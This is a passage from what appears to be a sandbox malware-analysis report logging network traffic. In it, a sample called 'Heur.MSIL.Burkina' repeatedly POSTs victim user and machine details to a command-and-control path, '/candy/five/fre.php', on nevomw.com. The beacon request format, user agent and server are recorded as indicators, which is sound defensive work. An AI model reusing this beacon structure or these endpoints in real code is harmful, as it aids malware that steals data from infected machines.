                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:16.177397966 CET1053OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:16.253380060 CET1056INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            71192.168.2.64979945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:16.497787952 CET1094OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:16.550455093 CET1101OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:16.625170946 CET1121INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            72192.168.2.64980045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:16.866136074 CET1144OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:16.918363094 CET1145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:16.992594004 CET1152INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            73192.168.2.64980245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:17.243861914 CET1185OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:17.297071934 CET1186OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:17.372365952 CET1186INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            74192.168.2.64980445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:17.613940001 CET1194OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:17.666379929 CET1195OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:17.740863085 CET1199INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            75192.168.2.64980545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:18.048964024 CET1201OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:18.101805925 CET1201OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:18.175754070 CET1202INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            76192.168.2.64980645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:18.420409918 CET1203OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:18.475081921 CET1203OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:18.551269054 CET1203INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            77192.168.2.64980745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:18.793375015 CET1204OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:18.845614910 CET1204OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:18.923599005 CET1205INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            78192.168.2.64980945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:19.339299917 CET1211OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:19.393095016 CET1214OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:19.473929882 CET1214INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            79192.168.2.64981045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:19.713181019 CET1219OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:19.767334938 CET1219OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:19.844413042 CET1219INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            8192.168.2.64972145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:45.670062065 CET82OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:45.722135067 CET82OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:45.795233965 CET82INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            80192.168.2.64981245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:20.223712921 CET1228OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:20.275996923 CET1229OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:20.352596998 CET1229INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            81192.168.2.64981445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:20.813499928 CET1237OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:20.866096020 CET1237OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:20.939320087 CET1242INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            82192.168.2.64981545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:21.264204979 CET1244OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:21.316510916 CET1245OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:21.393949986 CET1245INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            83192.168.2.64981745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:22.027796030 CET1253OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:22.080390930 CET1254OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:22.162085056 CET1258INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            84192.168.2.64981845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:23.193449974 CET1260OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:23.245426893 CET1260OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:23.321213007 CET1261INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            85192.168.2.64982045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:23.601424932 CET1267OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:23.656766891 CET1267OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:23.731801987 CET1270INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            86192.168.2.64982145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:23.968585968 CET1275OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:24.022847891 CET1275OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:24.096740961 CET1275INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            87192.168.2.64982245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:24.405828953 CET1276OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:24.457792044 CET1277OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:24.532399893 CET1278INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            88192.168.2.64982445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:24.836771011 CET1280OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
